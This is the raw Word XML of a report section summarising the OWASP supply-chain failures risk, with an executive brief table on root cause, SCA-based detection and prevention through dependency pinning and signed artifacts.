    <w:p w14:paraId="6517F04F"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Because millions of automated corporate build pipelines pull down the "latest patch" automatically under the assumption of implicit trust, the compromise spreads globally within minutes—proving that popularity does not equate to security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626AFE5C"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The Solution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DACEC55"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 xml:space="preserve">Shift the engineering team's mindset from </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Implicit Trust</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Zero-Trust Component Ingestion</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> . Developers must understand that public registries are essentially public message boards </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>where</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2DF35BB6"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anyone can post code. All code imported from the outside must be treated exactly like unvalidated user input: it must be inventoried, its hashes must be locked down, and its access privileges inside the runtime environment must be strictly contained.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C121EFE"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The Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3BFA3A" w14:textId="4FED6670" w:rsidR="00D66BA1" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Here is the executive brief block for the third vulnerability to finalize this section of your report:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617FBA6A" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="00B74432" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="PlainTable1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1760"/>
        <w:gridCol w:w="7155"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="67A47003" w14:textId="77777777" w:rsidTr="00B064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FB319A" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Attribute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18AAB312" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Breakdown</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="5FC704CA" w14:textId="77777777" w:rsidTr="00B064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69FEF4" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Vulnerability</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F66A4A4" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>OWASP A03:2025 – Software Supply Chain Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="71C6F3F6" w14:textId="77777777" w:rsidTr="00B0643B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="710F91B8" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Risk Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D5645F6" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="4F87CCE3" w14:textId="77777777" w:rsidTr="00B064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8A1F79" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Primary Root</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Cause</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65E64F94" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Applications ingest third-party packages, base images, and pipeline</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>tools without validating their cryptographic lineage or running them</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>within restricted privilege boundaries, allowing upstream vendor</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>compromises to execute natively inside production code.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="241A6A1B" w14:textId="77777777" w:rsidTr="00B0643B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27CBFE6D" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Quick Detection</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57EC6CE5" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve">Execute an </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>automated</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Software</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> Composition Analysis (SCA)</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>scan</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">(e.g., </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Snyk</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>, Dependency-Check) on project manifest files to map the</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>dependency tree and flag known CVEs or unmaintained open-source</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>packages.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="7E005711" w14:textId="77777777" w:rsidTr="00B064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654A47" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Ultimate</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Prevention</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CDF4FAC" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Enforce immutable dependency pinning using strict cryptographic</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>lockfile</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> hashes, utilize private artifact registry proxies to prevent</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">dependency confusion, and </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>implement</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Software</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> Supply Chain</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Attestations</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve">(e.g., </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Sigstore</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>/Cosign) to block unsigned container images</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>at the deployment gate.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="43985E6F" w14:textId="77777777" w:rsidTr="00B0643B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E19225B" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Key Business</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Danger</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5547EE93" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>The distribution of a poisoned software update directly to your clients—</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>or a silent, systemic production breach—resulting in total remote code</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>execution, catastrophic data exfiltration liability, and the absolute</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>destruction of marketplace and ecosystem trust.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
